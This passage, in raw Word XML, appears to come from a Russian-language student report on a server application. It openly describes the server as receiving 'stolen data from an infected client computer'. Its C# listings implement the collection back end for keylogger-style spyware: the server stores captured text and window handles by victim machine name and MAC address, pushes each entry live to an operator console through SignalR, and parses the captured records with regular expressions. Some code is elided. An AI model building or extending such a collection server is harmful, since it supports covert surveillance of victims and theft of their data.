        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0097483F" w:rsidRDefault="006C60B1" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="a7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9C7E11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> разрабатываемом серверном приложении </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>использу</w:t>
      </w:r>
      <w:r w:rsidR="0097483F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тся</w:t>
      </w:r>
      <w:r w:rsidR="009C7E11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0097483F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>два уровня сущностей: уровень для хранения в БД и уровень для передачи данных между клиентом и сервером.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C7E11" w:rsidRPr="00DC1A7C" w:rsidRDefault="0097483F" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="a7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доступа к БД используется </w:t>
      </w:r>
      <w:r w:rsidR="009C7E11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">класс, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>представляющий контекст БД</w:t>
      </w:r>
      <w:r w:rsidR="00ED6F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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EF</w:t>
      </w:r>
      <w:r w:rsidRPr="0097483F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6.0 </w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– л</w:t>
      </w:r>
      <w:r w:rsidR="00ED6F1F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">истинг </w:t>
      </w:r>
      <w:r w:rsidRPr="0097483F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="009C7E11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DC1A7C" w:rsidRPr="00DC1A7C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC1A7C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Диаграмма сущность-связь</w:t>
      </w:r>
      <w:r w:rsidR="008957DA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, описывающая структуру БД</w:t>
      </w:r>
      <w:r w:rsidR="00DC1A7C" w:rsidRPr="000C46BC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC1A7C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>представлена в приложении 1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED6F1F" w:rsidRPr="000C46BC" w:rsidRDefault="00ED6F1F" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:ind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Листинг</w:t>
      </w:r>
      <w:r w:rsidR="00362515" w:rsidRPr="000C46BC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0097483F" w:rsidRPr="000C46BC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0097483F" w:rsidRPr="0097483F" w:rsidRDefault="0097483F" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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97483F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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>public class LoggerContext : DbContext</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0097483F" w:rsidRPr="0097483F" w:rsidRDefault="0097483F" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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97483F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0097483F" w:rsidRPr="0097483F" w:rsidRDefault="0097483F" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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97483F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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public LoggerContext()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0097483F" w:rsidRPr="0097483F" w:rsidRDefault="0097483F" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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97483F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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: base("DbConnection")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0097483F" w:rsidRPr="0097483F" w:rsidRDefault="0097483F" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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97483F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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{ }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0097483F" w:rsidRPr="0097483F" w:rsidRDefault="0097483F" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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</w:p>
    <w:p w:rsidR="0097483F" w:rsidRPr="0097483F" w:rsidRDefault="0097483F" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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97483F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public DbSet&lt;PCItem&gt; PCItems { get; set; }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0097483F" w:rsidRPr="0097483F" w:rsidRDefault="0097483F" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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97483F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public DbSet&lt;LogData&gt; LogDatas { get; set; }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C7E11" w:rsidRPr="0097483F" w:rsidRDefault="0097483F" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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97483F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</w:t>
      </w:r>
      <w:r w:rsidRPr="0097483F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00221010" w:rsidRDefault="00221010" w:rsidP="00ED6F1F">
      <w:r w:rsidRPr="00221010">
        <w:t xml:space="preserve">Для работы с клиентским приложением пользователя </w:t>
      </w:r>
      <w:r>
        <w:t>в контроллере используются</w:t>
      </w:r>
      <w:r w:rsidRPr="00221010">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008957DA">
        <w:t>один публичный</w:t>
      </w:r>
      <w:r w:rsidRPr="00221010">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00221010">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00F010E1">
        <w:t xml:space="preserve"> метод.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00910C11" w:rsidRDefault="008957DA" w:rsidP="00910C11">
      <w:r w:rsidRPr="008957DA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Post</w:t>
      </w:r>
      <w:r w:rsidRPr="008957DA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C802D9">
        <w:t xml:space="preserve">метод </w:t>
      </w:r>
      <w:r w:rsidR="00F02388">
        <w:t>принимает сущность содержащую</w:t>
      </w:r>
      <w:r w:rsidR="000E6A34">
        <w:t xml:space="preserve"> украденные данные с зараженной клиентской ЭВМ</w:t>
      </w:r>
      <w:r w:rsidR="00ED6F1F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– листинг 1</w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:t>2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00910C11" w:rsidRDefault="00910C11">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:contextualSpacing w:val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D6F1F" w:rsidRPr="009C387D" w:rsidRDefault="00ED6F1F" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED6F1F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="009C387D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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>[HttpPost]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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public void Post([FromBody] LogDataForm data)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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var dataSort = ParsData(data);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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using (LoggerContext db = new LoggerContext())</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00F02388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0E6A34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    </w:t>
      </w:r>
      <w:r w:rsidR="00F02388">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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>...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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</w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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    var item = db.PCItems.Where(x =&gt; x.Name == data.Name &amp;&amp; x.MAC == data.MAC).FirstOrDefault();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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</w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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    var addLogDatas = new List&lt;LogData&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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    foreach (var dataItem in dataSort)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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        var log = new LogData</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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        {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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            Id = Guid.NewGuid(),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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            Data = dataItem.Value,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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            WindowHandleer = dataItem.Handler,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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            Date = data.Date,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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            Parant = item</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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        };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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        addLogDatas.Add(log);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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        db.LogDatas.Add(log);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="007B0751" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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7B0751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    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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    db.SaveChanges();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00F02388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0E6A34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    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E6A34" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C387D" w:rsidRPr="000E6A34" w:rsidRDefault="000E6A34" w:rsidP="00CF09AF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0E6A34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}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F02388" w:rsidRPr="00F02388" w:rsidRDefault="00F02388" w:rsidP="00083391">
      <w:r>
        <w:t xml:space="preserve">После получения и преобразования данных сервер оповещает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GUI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> о поступлении новых данных при помощи </w:t>
      </w:r>
      <w:r w:rsidRPr="000E6A34">
        <w:t>SignalR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– листинг 13</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F02388" w:rsidRPr="00F02388" w:rsidRDefault="00910C11" w:rsidP="00F02388">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t>Листинг 13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F02388" w:rsidRPr="000E6A34" w:rsidRDefault="00F02388" w:rsidP="00F02388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0E6A34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>// Получаем контекст хаба</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F02388" w:rsidRPr="007B0751" w:rsidRDefault="00F02388" w:rsidP="00F02388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7B0751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    var context =                    Microsoft.AspNet.SignalR.GlobalHost.ConnectionManager.GetHubContext&lt;MainConsoleHub&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F02388" w:rsidRPr="000E6A34" w:rsidRDefault="00F02388" w:rsidP="00F02388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0E6A34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    // отправляем сообщение</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F02388" w:rsidRPr="000E6A34" w:rsidRDefault="00F02388" w:rsidP="00F02388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0E6A34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    foreach (var logItem in addLogDatas)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F02388" w:rsidRPr="000E6A34" w:rsidRDefault="00F02388" w:rsidP="00F02388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0E6A34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    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F02388" w:rsidRPr="000E6A34" w:rsidRDefault="00F02388" w:rsidP="00F02388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0E6A34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        context.Clients.All.displayMessage(string.Format("{0} ({2}_{3}): {4}: {1}", logItem.Date, logItem.Data, logItem.Parant.Name, logItem.Parant.MAC, logItem.WindowHandleer));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B765B" w:rsidRPr="007F7B0B" w:rsidRDefault="007B0751" w:rsidP="00F02388">
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Кроме публичного метода контроллер содержит приватный метод для преобразования поступивших данных</w:t>
      </w:r>
      <w:r w:rsidR="00ED6F1F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– листинг 14</w:t>
      </w:r>
      <w:r w:rsidR="00DE3B96">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Метод использует технологию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Regex</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00485547" w:rsidRPr="00485547">
        <w:t>expression</w:t>
      </w:r>
      <w:r w:rsidR="00F02388">
        <w:t xml:space="preserve"> (регулярные выражения)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F7B0B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007F7B0B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F7B0B" w:rsidRPr="007F7B0B">
        <w:t xml:space="preserve">формальный язык поиска и осуществления манипуляций с подстроками в тексте, основанный на использовании метасимволов. Для поиска используется строка-образец, состоящая из символов и метасимволов и </w:t>
      </w:r>
      <w:r w:rsidR="007F7B0B">
        <w:t>задающая</w:t>
      </w:r>
      <w:r w:rsidR="007F7B0B" w:rsidRPr="007F7B0B">
        <w:t xml:space="preserve"> правило поиска. Для </w:t>
      </w:r>
      <w:r w:rsidR="007F7B0B" w:rsidRPr="007F7B0B">
        <w:lastRenderedPageBreak/>
        <w:t>манипуляций с текстом дополнительно задаётся строка замены, которая также может содержать в себе специальные символы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED6F1F" w:rsidRPr="009C387D" w:rsidRDefault="00ED6F1F" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED6F1F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="009C387D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7B0B" w:rsidRPr="001B4C63" w:rsidRDefault="007F7B0B" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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1B4C63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>private List&lt;CharValue&gt; ParsData(LogDataForm data)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7B0B" w:rsidRPr="007F7B0B" w:rsidRDefault="007F7B0B" w:rsidP="007F7B0B">
      <w:pPr>
        <w:pStyle w:val="a1"/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7F7B0B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{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7B0B" w:rsidRPr="007F7B0B" w:rsidRDefault="007F7B0B" w:rsidP="007F7B0B">
      <w:pPr>
        <w:pStyle w:val="a1"/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7F7B0B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var outPreList = new List&lt;CharValue&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7B0B" w:rsidRPr="007F7B0B" w:rsidRDefault="007F7B0B" w:rsidP="007F7B0B">
      <w:pPr>
        <w:pStyle w:val="a1"/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7F7B0B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var outList = new List&lt;CharValue&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7B0B" w:rsidRPr="001B4C63" w:rsidRDefault="007F7B0B" w:rsidP="001B4C63">
      <w:pPr>
        <w:pStyle w:val="a1"/>
      </w:pPr>
      <w:r w:rsidRPr="001B4C63">
        <w:t xml:space="preserve">            Regex regex = new Regex(@"~([^~]+)~:([^~]+) ~");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7B0B" w:rsidRPr="007F7B0B" w:rsidRDefault="007F7B0B" w:rsidP="007F7B0B">
      <w:pPr>
        <w:pStyle w:val="a1"/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7F7B0B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MatchCollection matches = regex.Matches(data.Data);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7B0B" w:rsidRPr="007F7B0B" w:rsidRDefault="007F7B0B" w:rsidP="007F7B0B">
      <w:pPr>
        <w:pStyle w:val="a1"/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7F7B0B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foreach (Match match in matches)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7B0B" w:rsidRPr="007F7B0B" w:rsidRDefault="007F7B0B" w:rsidP="007F7B0B">
      <w:pPr>
        <w:pStyle w:val="a1"/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7F7B0B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{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7B0B" w:rsidRPr="007F7B0B" w:rsidRDefault="007F7B0B" w:rsidP="007F7B0B">
      <w:pPr>
        <w:pStyle w:val="a1"/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7F7B0B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    Regex regexMin = new Regex(@"~.+~:");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7B0B" w:rsidRPr="007F7B0B" w:rsidRDefault="007F7B0B" w:rsidP="007F7B0B">
      <w:pPr>
        <w:pStyle w:val="a1"/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7F7B0B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    MatchCollection matchesMin = regexMin.Matches(match.Value);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7B0B" w:rsidRPr="007F7B0B" w:rsidRDefault="007F7B0B" w:rsidP="007F7B0B">
      <w:pPr>
        <w:pStyle w:val="a1"/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</w:p>
    <w:p w:rsidR="007F7B0B" w:rsidRPr="007F7B0B" w:rsidRDefault="007F7B0B" w:rsidP="007F7B0B">
      <w:pPr>
        <w:pStyle w:val="a1"/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7F7B0B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    outPreList.Add(new CharValue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7B0B" w:rsidRPr="007F7B0B" w:rsidRDefault="007F7B0B" w:rsidP="007F7B0B">
      <w:pPr>
        <w:pStyle w:val="a1"/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7F7B0B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    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7B0B" w:rsidRPr="007F7B0B" w:rsidRDefault="007F7B0B" w:rsidP="007F7B0B">
      <w:pPr>
        <w:pStyle w:val="a1"/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7F7B0B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        Handler= matchesMin[0].Value.Substring(1).Substring(0, matchesMin[0].Length - 3),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7B0B" w:rsidRPr="007F7B0B" w:rsidRDefault="007F7B0B" w:rsidP="007F7B0B">
      <w:pPr>
        <w:pStyle w:val="a1"/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7F7B0B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        Value = match.Value.Substring(matchesMin[0].Length, match.Value.Length- matchesMin[0].Length-1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7B0B" w:rsidRPr="007F7B0B" w:rsidRDefault="007F7B0B" w:rsidP="007F7B0B">
      <w:pPr>
        <w:pStyle w:val="a1"/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7F7B0B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    });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7B0B" w:rsidRPr="007F7B0B" w:rsidRDefault="007F7B0B" w:rsidP="007F7B0B">
      <w:pPr>
        <w:pStyle w:val="a1"/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7F7B0B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}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7B0B" w:rsidRPr="007F7B0B" w:rsidRDefault="007F7B0B" w:rsidP="007F7B0B">
      <w:pPr>
        <w:pStyle w:val="a1"/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</w:p>
    <w:p w:rsidR="007F7B0B" w:rsidRPr="007F7B0B" w:rsidRDefault="007F7B0B" w:rsidP="00DC5133">
      <w:pPr>
        <w:pStyle w:val="a1"/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7F7B0B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</w:t>
      </w:r>
      <w:r w:rsidR="00DC5133">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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>… // скрещивание данных от одного источника</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F7B0B" w:rsidRPr="007F7B0B" w:rsidRDefault="007F7B0B" w:rsidP="007F7B0B">
      <w:pPr>
        <w:pStyle w:val="a1"/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</w:p>
    <w:p w:rsidR="007F7B0B" w:rsidRPr="007F7B0B" w:rsidRDefault="007F7B0B" w:rsidP="007F7B0B">
      <w:pPr>
        <w:pStyle w:val="a1"/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7F7B0B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return outList;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C387D" w:rsidRPr="007F7B0B" w:rsidRDefault="007F7B0B" w:rsidP="007F7B0B">
      <w:pPr>
        <w:pStyle w:val="a1"/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7F7B0B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}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D43841" w:rsidRDefault="00D43841" w:rsidP="002024A1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
